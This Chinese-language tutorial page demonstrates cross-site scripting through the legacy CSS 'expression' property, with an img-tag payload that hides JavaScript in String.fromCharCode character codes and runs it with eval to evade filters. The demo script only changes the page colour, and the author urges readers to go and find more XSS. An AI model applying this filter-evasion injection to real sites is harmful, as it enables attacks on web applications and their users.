手机
当前位置:查字典教程网 >实用技巧 >安全教程 >expression&eval跨站的一个方法
expression&eval跨站的一个方法
摘要:expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程.我这里要说的是另外一...

expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程.

我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行.

<imgsrc="#"style="Xss:expression(eval(

String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">

嘿嘿,大把的XSS等你去挖掘,ENJOYIT:)

【expression&eval跨站的一个方法】相关文章:

Dedecms getip()的漏洞利用代码

linux提权用的一个技巧

NtGodMode.exe任意密码登录windows系统帐号下载

内网渗透-----如何打开突破口

phpMyAdmin 后台拿webshell

不用xp_cmdshell照样执行命令

新编MS07004网页木马源码代码

新云网站管理系统任意文件可下载漏洞

常用软件的静默安装方法介绍

完全解剖安全帐号管理器(SAM)结构

上一篇: XSS 0DAY代码
精品推荐
分类导航